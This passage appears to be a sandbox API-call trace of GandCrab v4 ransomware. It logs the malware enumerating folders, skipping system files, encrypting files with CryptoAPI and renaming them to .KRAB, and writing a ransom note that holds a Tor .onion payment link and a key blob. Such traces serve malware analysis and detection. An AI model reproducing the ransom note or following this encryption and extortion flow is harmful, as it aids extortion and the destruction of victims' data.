(lpString1="LogTransport2.cfg", lpString2="KRAB-DECRYPT.html") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="KRAB-DECRYPT.txt") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntldr") returned -1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="NTDETECT.COM") returned -1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="Bootfont.bin") returned 1 [0057.017] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.017] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0057.018] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.018] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.019] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.019] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0057.019] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.019] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.019] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0057.019] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.020] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.020] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.020] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0057.020] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.020] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.020] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0057.021] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdce0) returned 1 [0057.021] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.021] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.021] GetLastError () returned 0x0 [0057.021] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0057.021] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.022] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0057.022] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdce0) returned 1 [0057.022] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.022] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.022] GetLastError () returned 0x0 [0057.022] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0057.022] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.023] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0057.023] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0057.023] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.024] ReadFile (in: hFile=0x44c, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338ea7c*=0xd8, lpOverlapped=0x0) returned 1 [0057.037] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.037] WriteFile (in: hFile=0x44c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0xd8, lpOverlapped=0x0) returned 1 [0057.037] WriteFile (in: hFile=0x44c, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0057.038] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.041] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.042] CloseHandle (hObject=0x44c) returned 1 [0057.043] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.043] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg.krab")) returned 1 [0057.044] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.044] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.044] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0057.044] CloseHandle (hObject=0x430) returned 1 [0057.044] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.044] lstrcmpW (lpString1="Sonar", lpString2=".") returned 1 [0057.045] lstrcmpW (lpString1="Sonar", lpString2="..") returned 1 [0057.045] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Sonar" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar" [0057.045] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\" [0057.045] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0057.045] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.045] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.045] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.045] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.045] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.045] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.046] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\\\KRAB-DECRYPT.txt") returned 67 [0057.046] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0057.048] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.048] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.049] CloseHandle (hObject=0x430) returned 1 [0057.049] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.049] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.049] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0xf9)) [0057.049] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.050] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.050] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.050] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock") returned 73 [0057.050] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0057.050] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.051] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\") returned 50 [0057.051] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*" [0057.051] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbe0a0 [0057.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.051] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.051] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.051] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.051] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.051] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock" [0057.052] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.052] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 78 [0057.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a08d2ca4dee3d.lock") returned 73 [0057.052] lstrlenW (lpString=".lock") returned 5 [0057.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.052] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.052] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.053] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.053] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.053] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.053] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt" [0057.053] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.053] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt.KRAB") returned 71 [0057.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt") returned 66 [0057.053] lstrlenW (lpString=".txt") returned 4 [0057.053] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.054] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.054] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.054] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt") returned 66 [0057.054] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\KRAB-DECRYPT.txt") returned 66 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.054] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.054] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.055] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.055] lstrcmpW (lpString1="Sonar1.0", lpString2=".") returned 1 [0057.055] lstrcmpW (lpString1="Sonar1.0", lpString2="..") returned 1 [0057.055] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="Sonar1.0" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0057.055] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\" [0057.055] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0057.055] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.055] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.055] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.055] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.055] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.056] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.056] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\\\KRAB-DECRYPT.txt") returned 76 [0057.056] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0057.057] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 